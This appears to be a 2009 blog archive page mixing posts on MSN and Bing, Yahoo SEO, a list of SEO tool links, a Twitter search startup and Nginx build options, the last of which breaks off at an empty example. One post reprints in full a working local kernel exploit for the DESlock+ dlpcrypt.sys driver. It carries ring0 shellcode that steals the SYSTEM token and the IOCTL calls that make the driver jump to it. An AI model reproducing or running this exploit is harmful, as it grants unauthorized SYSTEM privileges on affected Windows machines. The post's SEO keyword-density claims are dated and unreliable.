Jun 22

MSN revamp to include stronger Bing ties

The planned fall revamp of MSN isn’t just about giving the butterfly a fresh coat of paint. Microsoft also hopes to drive more people to its search engine.

The company has been toying with different search box designs to see which ones lead to the most queries. As it stands, the MSN portal already accounts for half of Microsoft’s search engine traffic. Comparatively few people typed in queries straight from Microsoft’s Live.com address (now Bing.com)

"A big part of my job is figuring out how I pull the Bing experience into MSN in a way that makes sense," Microsoft vice president Erik Jorgensen said in an interview this week.

One way of banking on MSN, he said, is by posting features on the site that tie in to the company’s search engine. The company has talked about ways it can write features that push folks to Microsoft’s local, shopping, and travel search engines–each among the most profitable parts of the search business and the areas in which Microsoft has focused.

The software maker is also looking at ways it can tie MSN features to the strongest areas of Bing–local, shopping, and travel search.

(Credit: Microsoft)

To make that work, Microsoft needs to ensure that it is less visually jarring when one moves back and forth between MSN and Bing.

"Frankly, that’s one I think we haven’t done well," Jorgensen said. "I think in the fall that’s something we’ve got to tackle."

In its first two weeks, Bing has managed to pick up some market share, but the key will be sustaining those gains in the coming weeks and months.

Beyond driving traffic from MSN, Microsoft is also counting on deals with PC makers Hewlett-Packard and Dell to get more people to give Bing a try.

The company has said it wants to pick up at least a couple points of market share in the first year, although it will need well more than that to truly compete economically with Google. Hence the company’s never-ending talks with Yahoo, which is No. 2 in the search market with about 20 percent of the business.

Jun 21

Yahoo search engine Optimization

By jason SEO World No Comments »

Yahoo is considered one of the big three along with Google and MSN and by concentrating a little more time and effort on Yahoo optimization it is quite possible to gain a good amount of traffic. With ultra competitive keywords it may actually provide an easier way to generate search traffic than gearing all your efforts solely towards Google.

All search engines have their own algorithms to determine the value and, therefore, positioning of websites. While the majority of SEO work tends to concentrate on Google because of the sheer weight of searches they receive it would be foolish to discount or ignore the other major search engines.

The Most Important Yahoo Optimization Factor

The first, and most pertinent point is that Yahoo judges content to be the most important factor in their algorithms. They do still consider inbound links and other factors but they are attuned to the way of the content site and they love sites that provide keyword-optimized content in large mass. While that may make it sound easier than concentrating on generating a huge base of inbound links as you would for Google, Yahoo optimization presents its own challenges and its own unique quirks that you should consider.

Looking At Keyword Density

Because of the relevance that Yahoo places on the content within your site, the keyword once again becomes a vitally important aspect of your research. While Google have been striving to promote sites that use organic content and webmasters and SEOs have been optimizing with around 2% to 3% keyword density Yahoo prefers a much greater density level. The danger, of course, is that giving Yahoo what they want may cause Google to deem your content as being keyword stuffed but there is another difference between the two algorithms that can help to counteract this problem.

Using Stems, Inflexions, And Variants Of Keywords

Yahoo is very heavily language based. This means that it is, strictly speaking, more aware of the nuances of the written language. It will include synonyms and inflexions of a keyword when considering your keyword density; something that Google does not consider to the same extent. This means that it is possible to optimize for both without diminishing your ranking with one another.

How To Optimize For Yahoo Without Getting Penalized By Google

Google likes a density of around 2% and Yahoo likes a density as high as 7% or even 8%. This means that you can effectively use 4 variations of a single keyword or phrase and a density of 2% for each. This offers further advantages. With Google you are now gearing your content towards four different keywords and offering the level they want, and you are still providing Yahoo with the much higher density rate that they require. Because you can include plurals and further stems of keywords this means you can write in a much more natural tone.

Using The Near Forgotten Meta Tags

One area that a lot of SEO professionals and webmasters alike now tend to overlook is the Meta tag. However, Yahoo appears to still give consideration to the keyword and description tags in particular. This is quite rare in the case of most search engines and Google certainly do not look for keywords in your Meta tags. Do not attempt to dupe Yahoo, though, and only include keywords that genuinely appear on your page and are relevant to your topic.

Regular, Fresh Content Is King

You’ve probably heard the saying that "content is king" and this is even truer when considering Yahoo optimization. The more content you provide the better. This may mean making regular additions to your site but it will generate the kind of results you are looking for. Blogs are also a very good way to continue adding relevant content to your site that Yahoo will smile down on.

The Lazy Yahoo Bot

Compared to other search engine spiders the Yahoo bot is a comparatively lazy animal. It doesn’t crawl as often as other bots and it certainly doesn’t crawl as deep into your site to find all of your pages and index them. This means you should pay extra attention to creating a legible sitemap and keeping it updated as regularly as possible. Yahoo has a sitemap submission feature that is similar to Google’s and using this is heavily recommended to try and ensure that Yahoo stays on top of the infrastructure of your site and ranks you accordingly.

Inbound Links And Controlling Them Yourself

Inbound links are still important to Yahoo, but again a lot of emphasis is placed on content. Textual relevance seems to be one of the most important factors so having control over your inbound links and being able to determine the pages where they appear and the anchor text of each is important. Perhaps the best way to generate inbound links for Yahoo optimization is to use the article directories to your benefit.

Yahoo Optimization Conclusion

Google may be the search engine that everyone talks about and optimizes for but ignoring Yahoo would be foolish. This is especially true because while the Yahoo algorithm is quite different to the Google one and other algorithms, it is still quite easy to optimize for both. The most important factors to remember are to use relevant Meta tags for every single page of your site, include as much content and update your site with new content as often as possible, and update a sitemap both on your website and with the Yahoo sitemaps function.

Tagged with: seo • yahoo

Jun 20

DESlock dlpcrypt.sys Local Kernel ring0 Code Execution Exploit

By jason Security Tools No Comments »

/* deslock-dlpcrypt.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* DESlock+ 4.0.2 local kernel SYSTEM exploit
* by mu-b – Thu 18 Jun 2009
*
* – Tested on: dlpcrypt.sys 0.1.1.27
*
* .text:0001BB2E: ‘what do ya want for nothing?’
* – hmmm, something that doesn’t pass kernel mode pointers
* between kernel and userland?
*
* Compile: MinGW + -lntdll
*
* – Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ — Digit-Labs 2009!@$!
*/

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

#define DLPCRYPT_IOCTL_ENABLED  0x8001200C
#define DLPCRYPT_IOCTL_ADD      0x80012004
#define DLPCRYPT_IOCTL_PROCESS  0x80012010

#define DLPCRYPT_FLAG1          0x13B45FA8
#define DLPCRYPT_FLAG2          0xBFD294C9

static unsigned char win32_fixup[] =
  "\x56";

/* Win2k3 SP1/2 - kernel EPROCESS token switcher
 * by mu-b <mu-b@digit-lab.org>
 */
static unsigned char win2k3_ring0_shell[] =
  /* _ring0 */
  "\xb8\x24\xf1\xdf\xff"
  "\x8b\x00"
  "\x8b\xb0\x18\x02\x00\x00"
  "\x89\xf0"
  /* _sys_eprocess_loop   */
  "\x8b\x98\x94\x00\x00\x00"
  "\x81\xfb\x04\x00\x00\x00"
  "\x74\x11"
  "\x8b\x80\x9c\x00\x00\x00"
  "\x2d\x98\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  "\xeb\x21"
  /* _sys_eprocess_found  */
  "\x89\xc1"
  "\x89\xf0"

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x94\x00\x00\x00"
  "\x81\xfb\x00\x00\x00\x00"
  "\x74\x10"
  "\x8b\x80\x9c\x00\x00\x00"
  "\x2d\x98\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  /* _not_found           */
  "\xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "\x8b\x89\xd8\x00\x00\x00"
  "\x89\x88\xd8\x00\x00\x00"
  "\x90";

static unsigned char winxp_ring0_shell[] =
  /* _ring0 */
  "\xb8\x24\xf1\xdf\xff"
  "\x8b\x00"
  "\x8b\x70\x44"
  "\x89\xf0"
  /* _sys_eprocess_loop   */
  "\x8b\x98\x84\x00\x00\x00"
  "\x81\xfb\x04\x00\x00\x00"
  "\x74\x11"
  "\x8b\x80\x8c\x00\x00\x00"
  "\x2d\x88\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  "\xeb\x21"
  /* _sys_eprocess_found  */
  "\x89\xc1"
  "\x89\xf0"

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x84\x00\x00\x00"
  "\x81\xfb\x00\x00\x00\x00"
  "\x74\x10"
  "\x8b\x80\x8c\x00\x00\x00"
  "\x2d\x88\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  /* _not_found           */
  "\xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "\x8b\x89\xc8\x00\x00\x00"
  "\x89\x88\xc8\x00\x00\x00"
  "\x90";

static unsigned char win32_ret[] =
  "\x5e"
  "\x58"
  "\x58"
  "\x33\xc0"
  "\x5e"
  "\x5d"
  "\xc2\x0c\x00";

struct ioctl_req_enable {
  int flag[2];
  int len;
  int result;
  int enabled;
  char pad[0x38 - 0x14];
};

struct ioctl_req {
  int flag[2];
  int len;
  int result;
  int action;
  struct ioctl_ptr *ptr;
  char pad[0x38 - 0x18];
};

struct ioctl_ptr {
  char pad[0x8];
  struct ioctl_pid *ppid;
  int action;
  char _pad[0x4];
  struct ioctl_func *func;
};

struct ioctl_pid {
  char pad[0x14];
  DWORD pid;
};

struct ioctl_func {
  void *func_ptr;
};

static PCHAR
fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
  DWORD dwVersion, dwMajorVersion, dwMinorVersion;

  dwVersion = GetVersion ();
  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

  if (dwMajorVersion != 5)
    {
      fprintf (stderr, "* GetVersion, unsupported version\n");
      exit (EXIT_FAILURE);
    }

  switch (dwMinorVersion)
    {
      case 1:
        *zlen = sizeof winxp_ring0_shell - 1;
        *(PDWORD) &winxp_ring0_shell[55] = ppid;
        return (winxp_ring0_shell);

      case 2:
        *zlen = sizeof win2k3_ring0_shell - 1;
        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
        return (win2k3_ring0_shell);

      default:
        fprintf (stderr, "* GetVersion, unsupported version\n");
        exit (EXIT_FAILURE);
    }

  return (NULL);
}

int
main (int argc, char **argv)
{
  struct ioctl_req_enable req_enable;
  struct ioctl_req req;
  struct ioctl_ptr ptr;
  struct ioctl_pid pid;
  struct ioctl_func func;
  LPVOID c_addr, zpage, zbuf;
  DWORD rlen, zlen, ppid;
  HANDLE hFile;
  BOOL bResult;

  printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\\\.\\DLPCryptCore", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (zpage == NULL)
    {
      fprintf (stderr, "* VirtualAlloc failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]\n",
          zpage, 0x10000);

  memset (zpage, 0xCC, 0x10000);
  zbuf = fixup_ring0_shell (ppid, &zlen);
  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req_enable, 0, sizeof req_enable);
  req_enable.flag[0] = DLPCRYPT_FLAG1;
  req_enable.flag[1] = DLPCRYPT_FLAG2;
  req_enable.len = sizeof req_enable;

  printf ("* verifying context... ");
  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED,
                             &req_enable, sizeof req_enable,
                             &req_enable, sizeof req_enable, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled);

  printf ("* adding pid [%d]... ", GetCurrentProcessId ());
  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD,
                             &req_enable, sizeof req_enable,
                             &req_enable, sizeof req_enable, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  memset (&req, 0, sizeof req);
  req.flag[0] = DLPCRYPT_FLAG1;
  req.flag[1] = DLPCRYPT_FLAG2;
  req.len = sizeof req;
  req.action = 2;
  req.ptr = &ptr;

  memset (&ptr, 0, sizeof ptr);
  ptr.ppid = &pid;
  ptr.action = 2;
  ptr.func = &func;

  memset (&pid, 0, sizeof pid);
  pid.pid = GetCurrentProcessId ();

  memset (&func, 0, sizeof func);
  func.func_ptr = &c_addr;

  c_addr = (LPVOID) zpage;

  printf ("* req.ptr: 0x%08X\n", &ptr);
  printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr:  0x%08X\n",
          &ptr, ptr.ppid, ptr.func);
  printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr);
  printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr);

  /* jump to our address :) */
  printf ("* jumping.. ");
  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS,
                             &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n\n"
          "* hmmm, you didn't STOP the box?!?!\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}

Tagged with: DESlock • exploit

Jun 18

SEO Tools Collection

By jason SEO World 1 Comment »

Search Engine Submissions
1. Submit Express – http://www.submitexpress.com/newsletters/dec_15_00.html (A lot of people utilize this service. I don’t utilize it)
2. Alexa – http://pages.alexa.com/help/webmaste…tml#crawl_site
3. AOL – http://search.aol.com/aolcom/add.jsp
4. DMOZ Dummies Guide – http://www.dummies-guide-to-dmoz.org…not_google.htm
5. DMOZ Instructions – http://dmoz.org/add.html
6. DMOZ Resource Forum – http://resource-zone.com/forum/showthread.php?t=396 (This is where you go when you website doesn’t show up in DMOZ after you have submitted READ THEIR RULES FOR ASKING)
7. ExactSeek – http://www.exactseek.com/freemember.html
8. Google – http://www.google.com/addurl.html
9. Yahoo http://submit.search.yahoo.com/free/request (You must have an account)
10. Yahoo Directory Help – http://docs.yahoo.com/info/suggest/appropriate.html
11. Yahoo Express Submit TOS – https://ecom.yahoo.com/dir/express/terms (After reading the TOS for Yahoo, I would never submit my website to Yahoo and pay the $300.00 to due so- Everyone, I broke down and was forced to pay the $300.00. The website would not get past 30 for months and about 2 weeks after we paid it we are now number 10.)
12. Yahoo Submit Help – http://help.yahoo.com/help/us/dir/su…uggest-01.html
13. MSN – http://beta.search.msn.com/docs/submit.aspx?

Google
1. Reporting Spam to Google – http://www.google.com/contact/spamreport.html
2. Use Google to search your website – http://www.google.com/services/free.html
3. Submit your website to Google – http://www.google.com/addurl.html
4. Monitor Keyword Phrases – http://google.com/webalerts (This is neat to check out however does not help that much)
5. Googles Guidelines for Websmasters – http://www.google.com/webmasters/guidelines.html (A must read new people)
6. Facts for Webmasters – http://www.google.com/webmasters/facts.html
7. Having Trouble? Contact Google Directly – http://www.google.com/ads/offices.html
8. Googles Top 3 asked Questions – http://www.google.com/contact/search.html

Webmaster Forums
1. Web Pro World – http://www.webproworld.com/forum.php
2. Webmaster World – www.webmasterworld.com
3. Digital Point – http://forums.digitalpoint.com
4. Search Engine World – www.searchengineworld.com
(There are 10,000,000 others but those are some good ones)

Newsletters & Articles
1. Site Pro News – www.sitepronews.com (This guy has some great articles however he tells you up front he knows nothing of SEO)
2. In Stat – http://www.instat.com/ (This has some decent insite)
3. Page Rank Explained – http://www.webworkshop.net/pagerank….olbar_pagerank
4. Seach Engine Ratings and Reviews – http://searchenginewatch.com/reports/
5. Database of Robots – http://www.robotstxt.org/wc/active/html/index.html
(Ever wondered anything about the spiders that are out there?)
6. Guide to deisgning a website – http://www.webstyleguide.com/index.html?/contents.html – This is an online book that tells you the basics of website design.

Froogle
1. Get your products into Froogle – http://services.google.com/froogle/merchant_email
Advertising
1. PPC with Espotting – http://www.espotting.com/advertisers…ferralTypeID=1
Website Design & Tools
1. Free Forms for your website TFMail – http://nms-cgi.sourceforge.net/
2. Validate Your HTML – http://validator.w3.org/
3. HTTP Error Code Meanings – http://www.searchengineworld.com/val…errorcodes.htm
4. Keyword Tracking – http://www.digitalpoint.com/tools/keywords/
5. Link Checker – http://dev.w3.org/cvsweb/~checkout~/…0charset=utf-8
6. Search Engine Relationship Chart – http://www.bruceclay.com/searchengin…nshipchart.htm
Bruce Clay does an excellent job of keeping this updated.
7. Link Popularity Checker (Uptime Bot) – http://www.uptimebot.com/
8. Character Counting – http://a1portal.com/freetools/charcount.htm (This is great when optimizing your title or meta tags)
9. Character Encoding – http://www.itnews.org.uk/w_qrefs/w_i…p_charsets.cfm (Ever wonder what those iso-8859-4 or utf-8 were or how to use them?)
10. Converting Hex to Dec or Vias Versa – http://www.hypersolutions.org/pages/hex.html#DectoHex
11. Ascii-Dec-Hex Conversion Code Chart – http://www.sonofsofaman.com/misc/ascii/default.asp
12. Ascii-HTML View Conversion Chart – http://a1portal.com/freetools/asciicodes.htm (This is an excellent resource when placing ascii code on your website. Remember to use the correct character encoding)
13. Ascii Chart in .GIF Format –
14. Customer Focus Tool – http://www.futurenowinc.com/wewe.htm (Tells you whether your website is focused on your customers or not)
15. Dead Link Checker – http://www.dead-links.com/ (Doesn’t crawl links within Frames or JavaScript)
16. Adsense Simulator – http://www.digitalpoint.com/tools/adsense-sandbox/ (This will give you an idea of what ads will be displayed on your website before you place them)
17. Google Page Rank Calculator – http://www.webworkshop.net/pagerank_…ator.php3?pgs= (This is an advanced tool for finding out what you need to get your PR to the next level.)
18. Page Rank Finder – http://www.seo-guy.com/seo-tools/google-pr.php (This is a great tool to find quality websites with the PR that you are looking for to exchange websites with. This tool only looks at the home page not the link pages. This tool looks at 10 pages or 100 results)
19. Future Google PR – http://www.searchengineforums.com/ap…e::eek:rphans/ – This is an article that tells you what datacenter your Google PR is udpated on first.
20. Keyword Analysis Tool – http://www.mcdar.net/ – This tool is a must. It’s quick and easy to use
21. Keyword Density Analyzer – http://www.webjectives.com/keyword.htm
22. Keyword Difficulty Checker – http://www.searchguild.com/cgi-bin/difficulty.pl (You will need a Google API for this one)
23. Free Google API – http://www.google.com/api
24. Rocket Rank – http://www.rocketrank.com/ – This will only check the top 20 of the following SE’s:
(All The Web DMOZ AltaVista Overture Excite Web Crawler HotBot Lycos What U Seek Yahoo)
Keyword Suggestion Tools:
25. WordTracker & Overture Suggestions http://www.digitalpoint.com/tools/suggestion/ – This is the best one of the three
26. Adwords Suggestion – https://adwords.google.com/select/ma…KeywordSandbox
27. Overture Suggestion – http://inventory.overture.com/d/sear…ry/suggestion/
28. Link Analyzer – http://www.scribbling.net/analyze-web-page-links Analyze the ratio of internal liinks vs. external links. This is a good tool when determining page rank leakage.
29. Link Appeal – http://www.webmaster-toolkit.com/link-appeal.shtml (Want to know whether or not you actually want your link on that page?)
30. Link City – http://showcase.netins.net/web/phdss/linkcity/ (This place has EVERY tool under the sun for everything you could ever possibly want)
31. Link Reputation – http://198.68.180.60/cgi-bin/link-reputation-tool.cgi (Reveals baclinks pointing to the target URL along with a link survey for eack backlink.)
32. Google PR Tools – http://www.thinkbling.com/tools.php (This guy has tons of fantastic tools. He is not as popular as some of the rest but the tools are great)
33. Protect Your e-mail address – http://www.fingerlakesbmw.org/main/flobfuscate.php (Obfuscates your e-mail so spambots don’t pick it up from the Internet)
34. Digital Points Ad Network – http://www.digitalpoint.com/tools/ad-network/?s=2197 – After using all of the tools and more on this page. This has helped out the rankings faster than anything else.
35. Sandbox Detection Tool – http://www.socengine.com/seo/tools/sandbox-tool.php – Is your website being sandboxed?
36. Spider Simulation – http://www.submitexpress.com/analyzer/ – See what the spider sees on your website
37. SEO-Toys – http://seo-toys.com/ – These are some things that I had in my favorites. Some of them are okay.
38. Multiple SEO Tools – http://www.free-seo-tools.com/ – This website has a variety of misc. tools on it that you can use to better your search engine rankings.
39. Bot Spotter – http://sourceforge.net/projects/botspotter – This is a phenomenal script that will track what bots hit your website at what times. (Runs on PHP enabled websites)
40. Net Mechanic – http://www.netmechanic.com/toolbox/power_user.htm – This will break your website down and tell you any errors that you may be unaware of.
41. Statcounter – http://www.statcounter.com/ – This will track your clients throughout the dynamically created pages of your website. This is a free service. (of course I don’t have to mention this to you guys)
42. Dr. HTML – http://www.fixingyourwebsite.com/drhtml.html – This will test your website for any errors that you may be unaware of and tell you how to fix them.
43. Page Rank Calculation – http://www.sitepronews.com/pagerank.html

Webmaster Information
1. Want to know where all of the Internet traffic is at? – http://www.internettrafficreport.com/main.htm
ISAPI Rewrites
1. URL Replacer – (Free) – http://www.motobit.com/help/url-repl…od-rewrite.asp
2. Mod Rewrite2 – ($39.90US) – http://www.iismods.com/url-rewrite/index.htm
3. URL Rewrite – (23.00EUR) – http://www.smalig.com/url_rewrite-en.htm
Link Exchanging
1. Links Manager ($20.00US /mo)- http://linksmanager.com/cgi-bin/cook/control_panel.cgi (This is great for the beginner however you will find out that you need to majorly adjust your pages manually in order to pread page rank throughout them otherwise you end up with 20 pages with no PR and 1 page with PR.)
2. Page Rank Finder – http://www.seo-guy.com/seo-tools/google-pr.php (This is a great tool to find quality websites with the PR that you are looking for to exchange websites with. This tool only looks at the home page not the link pages. This tool looks at 10 pages or 100 results)
3. Link Appeal – http://www.webmaster-toolkit.com/link-appeal.shtml (Want to know whether or not you actually want your link on that page?)

Tagged with: search engine • seo tools • submit

Jun 18

Microsoft veteran launches Twitter search engine

By jason IT News World No Comments »

The former head of Microsoft’s search unit may have left Redmond, but he is still very much in the search game.

Ken Moss, who led the search engineering team at Microsoft for five years, has spent the last months building CrowdEye, a real-time search engine that aims to allow users to better mine Twitter to get a pulse on hot topics.

The service, which is going into public beta on Thursday, offers up not only the latest tweets on a topic, but also a list of the most popular links on a topic and a tag cloud of associated terms.

I think that real-time search is the next big thing in search," Moss said in a telephone interview. "It’s an area that has been underexploited to date."

Searching Twitter is good for news, he said, but also for things such as finding the latest viral video or a solution to a new software bug.

Of course, Moss is not alone in this thinking. Twitter has its own search engine, while others such as Topsy and OneRiot, are also mining the twitterverse.

Among its features, CrowdEye has a historical view that allows one to see how the discussion on a topic has evolved. Although, for now, that historical period is only three days.

"Right now that’s all we support, but its definitely something I’d anticipate growing over time," Moss said.

Moss has been working on CrowdEye for about nine months. For now, his only other co-worker is his wife, Becca Moss, also a former ‘softie.

"Right now it is still the two of us for now, but we hope to expand that soon," Moss said.

Moss said he looks forward to listening to feedback once the product goes public and already has a long to-do list of things he would like to add, things such as adding more real-time sources beyond twitter.

"I think there’s a very long list of exciting improvements that will take us a long while," he said.

The plan to launch CrowdEye was noted earlier by ZDNet’s Mary Jo Foley and on Seattle-area news site TechFlash.

Tagged with: microsoft • search engine • twitter

Jun 18

Nginx compile options

By jason Nginx Server No Comments »

configure determines the features of system and, in particular, the methods, which nginx can use for handling connections. Finally it creates the Makefile.

configure supports the following options:

–prefix=<path> – The path relative to which all other Nginx paths will resolve. If not specified, defaults to /usr/local/nginx.

–sbin-path=<path> – The path to the nginx executable. Only used for installation. If not specified defaults to <prefix>/sbin/nginx.

–conf-path=<path> – The default location of nginx.conf if no -c parameter is provided. If not provided, defaults to <prefix>/conf/nginx.conf.

–pid-path=<path> – The path to nginx.pid, if not set via the "pid" directive in nginx.conf. If not provided, defaults to <prefix>/logs/nginx.pid.

–lock-path=<path> – The path to the nginx.lock file. If not provided, defaults to <prefix>/logs/nginx.lock.

–error-log-path=<path> – The location of the error log if not set via the "error_log" in nginx.conf. If not set, defaults to <prefix>/logs/error.log.

–http-log-path=<path> – The location of the access log if not set via the "access_log" directive in nginx.conf. If not set, defaults to <prefix>/logs/access.log.

–user=<user> – The default user that nginx will run as if not set in nginx.conf via the "user" directive. If not set, defaults to "nobody".

–group=<group> – The default group that nginx will run under if not set via the "user" directive in nginx.conf. If not set defaults to "nobody".

–builddir=DIR – Set the build directory

–with-rtsig_module – Enable rtsig module

–with-select_module –without-select_module – Whether or not to enable the select module. This module is enabled by default if a more suitable method such as kqueue, epoll, rtsig or /dev/poll is not discovered by configure.

–with-poll_module –without-poll_module – Whether or not to enable the poll module. This module is enabled by default if a more suitable method such as kqueue, epoll, rtsig or /dev/poll is not discovered by configure.

–with-http_ssl_module – Enable ngx_http_ssl_module. Enables SSL support and the ability to handle HTTPS requests. Requires OpenSSL. On Debian, this is libssl-dev.

–with-http_realip_module – Enable ngx_http_realip_module

–with-http_addition_module – Enable ngx_http_addition_module

–with-http_sub_module – Enable ngx_http_sub_module

–with-http_dav_module – Enable ngx_http_dav_module

–with-http_flv_module – Enable ngx_http_flv_module

–with-http_stub_status_module – Enable the "server status" page

–without-http_charset_module – Disable ngx_http_charset_module

–without-http_gzip_module – Disable ngx_http_gzip_module. Requires zlib if enabled.

–without-http_ssi_module – Disable ngx_http_ssi_module

–without-http_userid_module – Disable ngx_http_userid_module

–without-http_access_module – Disable ngx_http_access_module

–without-http_auth_basic_module – Disable ngx_http_auth_basic_module

–without-http_autoindex_module – Disable ngx_http_autoindex_module

–without-http_geo_module – Disable ngx_http_geo_module

–without-http_map_module – Disable ngx_http_map_module

–without-http_referer_module – Disable ngx_http_referer_module

–without-http_rewrite_module – Disable ngx_http_rewrite_module. Requires PCRE if enabled.

–without-http_proxy_module – Disable ngx_http_proxy_module

–without-http_fastcgi_module – Disable ngx_http_fastcgi_module

–without-http_memcached_module – Disable ngx_http_memcached_module

–without-http_limit_zone_module – Disable ngx_http_limit_zone_module

–without-http_empty_gif_module – Disable ngx_http_empty_gif_module

–without-http_browser_module – Disable ngx_http_browser_module

–without-http_upstream_ip_hash_module – Disable ngx_http_upstream_ip_hash_module

–with-http_perl_module – Enable ngx_http_perl_module

–with-perl_modules_path=PATH – Set path to the perl modules

–with-perl=PATH – Set path to the perl binary

–http-client-body-temp-path=PATH – Set path to the http client request body temporary files. If not set, defaults to <prefix>/client_body_temp

–http-proxy-temp-path=PATH – Set path to the http proxy temporary files. If not set, defaults to <prefix>/proxy_temp

–http-fastcgi-temp-path=PATH – Set path to the http fastcgi temporary files. If not set, defaults to <prefix>/fastcgi_temp

–without-http – Disable HTTP server

–with-mail – Enable IMAP4/POP3/SMTP proxy module

–with-mail_ssl_module – Enable ngx_mail_ssl_module

–with-cc=PATH – Set path to C compiler

–with-cpp=PATH – Set path to C preprocessor

–with-cc-opt=OPTIONS – Additional parameters which will be added to the variable CFLAGS. With the use of the system library PCRE in FreeBSD, it is necessary to indicate –with-cc-opt="-I /usr/local/include". If we are using select() and it is necessary to increase the number of file descriptors, then this also can be assigned here: –with-cc-opt="-D FD_SETSIZE=2048".

–with-ld-opt=OPTIONS – Additional parameters passed to the linker. With the use of the system library PCRE in FreeBSD, it is necessary to indicate –with-ld-opt="-L /usr/local/lib".

–with-cpu-opt=CPU – Build for specified CPU, the valid values: pentium, pentiumpro, pentium3, pentium4, athlon, opteron, amd64, sparc32, sparc64, ppc64

–without-pcre – Disable PCRE library usage. Also disables HTTP rewrite module. PCRE is also required for regular expressions in "location" directive.

–with-pcre=DIR – Set path to PCRE library sources.

–with-pcre-opt=OPTIONS – Set additional options for PCRE building.

–with-md5=DIR – Set path to md5 library sources.

–with-md5-opt=OPTIONS – Set additional options for md5 building.

–with-md5-asm – Use md5 assembler sources.

–with-sha1=DIR – Set path to sha1 library sources.

–with-sha1-opt=OPTIONS – Set additional options for sha1 building.

–with-sha1-asm – Use sha1 assembler sources.

–with-zlib=DIR – Set path to zlib library sources.

–with-zlib-opt=OPTIONS – Set additional options for zlib building.

–with-zlib-asm=CPU – Use zlib assembler sources optimized for specified CPU, valid values are: pentium, pentiumpro

–with-openssl=DIR – Set path to OpenSSL library sources

–with-openssl-opt=OPTIONS – Set additional options for OpenSSL building

–with-debug – Enable debug logging

–add-module=PATH – Add in a third-party module found in directory PATH

Options may vary slightly between versions. Always check ./configure –help for the current list.

Examples

Example 1

This is a single line!

./configure \
  --sbin-path=/usr/local/nginx/nginx \
  --conf-path=/usr/local/nginx/nginx.conf \
  --pid-path=/usr/local/nginx/nginx.pid \
  --with-http_ssl_module \
  --with-pcre=../pcre-4.4 \
  --with-zlib=../zlib-1.1.3

Example 2

Default Debian Lenny.

./configure \
  --conf-path=/etc/nginx/nginx.conf \
  --error-log-path=/var/log/nginx/error.log \
  --pid-path=/var/run/nginx.pid \
  --lock-path=/var/lock/nginx.lock \
  --http-log-path=/var/log/nginx/access.log \
  --with-http_dav_module \
  --http-client-body-temp-path=/var/lib/nginx/body \
  --with-http_ssl_module \
  --http-proxy-temp-path=/var/lib/nginx/proxy \
  --with-http_stub_status_module \
  --http-fastcgi-temp-path=/var/lib/nginx/fastcgi \
  --with-debug \
  --with-http_flv_module

Example 3

I use this configuration for 50+ worth millions impressions per day.

./configure \
  --prefix=/usr \
  --conf-path=/etc/nginx/nginx.conf \
  --http-log-path=/var/log/nginx/access_log \
  --error-log-path=/var/log/nginx/error_log \
  --pid-path=/var/run/nginx.pid \
  --http-client-body-temp-path=/var/tmp/nginx/client \
  --http-proxy-temp-path=/var/tmp/nginx/proxy \
  --http-fastcgi-temp-path=/var/tmp/nginx/fastcgi \
  --with-md5-asm --with-md5=/usr/include \
  --with-sha1-asm \
  --with-sha1=/usr/include \
  --with-http_realip_module \
  --with-http_ssl_module \
  --with-http_perl_module \
  --with-http_stub_status_module

Example 4

Example on Ubuntu/debian with libgcrypt11-dev, libpcre3-dev and libssl-dev installed (choose EITHER –with-md5 OR –with-sha1, but not both; on debian and ubuntu, they should both point to /usr/lib)

./configure --with-openssl=/usr/lib/ssl/ --with-md5=/usr/lib

An Ubuntu Edgy .deb for version 0.5.2 can be found here: nginx_0.5.2-1_i386.deb .

Example 5

